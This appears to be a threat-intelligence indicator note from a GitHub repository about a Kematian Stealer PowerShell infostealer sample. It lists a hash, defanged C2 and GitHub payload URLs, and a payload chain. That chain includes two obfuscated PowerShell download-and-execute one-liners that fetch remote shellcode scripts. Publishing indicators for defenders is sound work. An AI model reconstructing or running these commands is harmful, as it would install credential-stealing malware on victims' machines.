-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path2024-08-21-Kematian-Stealer-info.txt
54 lines (34 loc) · 2.15 KB
/
2024-08-21-Kematian-Stealer-info.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
2024-08-21 (WEDNESDAY) KEMATIAN STEALER SAMPLE
AUTHOR:
- Anthony Galiette
REFERENCES:
- https://www.linkedin.com/posts/unit42_powershell-stealer-kematian-activity-7232151005109350401-FDbG
- https://x.com/Unit42_Intel/status/1826385383308824612
NOTES:
- Kematian Stealer was first reported in July 2024 as "a PowerShell based Token-Grabber." [1]
- Kematian Stealer is actively developed and distributed through GitHub as an open source tool. [2]
- One of the Kematian Stealer C2 server control panels was active at hxxps[:]//64.52.80[.]191:8080/ in July 2024. [3]
- We noticed the following Kematian Stealer sample submitted to VirusTotal earlier today.
ORIGINAL REFERENCES:
- [1] https://labs.k7computing.com/index.php/kematian-stealer-forked-from-powershell-token-grabber/
- [2] https://www.cyfirma.com/research/kematian-stealer-a-deep-dive-into-a-new-information-stealer/
- [3] https://urlscan.io/result/212087c7-68d3-4041-b641-05f7c3df17a4/
KEMATIAN STEALER SAMPLE:
- SHA256 hash: 4f1745dc20453c92c7025b8ffb40e2789070b604624f09117f8b3406fb6c46de
- File size: 3,147 bytes
- File location: hxxps[:]//raw.githubusercontent[.]com/43a1723/test/main/download.ps1
- File type: Unicode text, UTF-8 text
- File description: PowerShell script for Kematian Stealer
- First submitted to VirusTotal: 2024-08-21 00:14:25 UTC
CURRENT GITHUB REPOSITORY FOR KEMATIAN STEALER AT THE TIME OF THIS POST:
- hxxps[:]//github[.]com/Pirate-Devs/Kematian
GITHUB ACCOUNT HOSTING VARIOUS REPOSITORIES FOR KEMATIAN STEALER PAYLOADS:
- hxxps[:]//github[.]com/43a1723/
PAYLOAD CHAIN FOR KEMATIAN STEALER FROM GITHUB:
- hxxps[:]//github[.]com/43a1723/test/releases/download/AutoBuild/download.bat
- powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('hxxps[:]//
raw.githubusercontent[.]com/43a1723/test/main/Extras/shellcode.ps1'))
NOTE: Above script retrieves file from hxxps[:]//github[.]com/43a1723/test/raw/main/Extras/hacklife/main.bin
- powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('hxxps[:]//
raw.githubusercontent[.]com/43a1723/test/main/Extras/shellcode1.ps1'))
NOTE: Above script retrieves file from hxxps[:]//anonsharing[.]com/file/299cef131201faea/hack.exe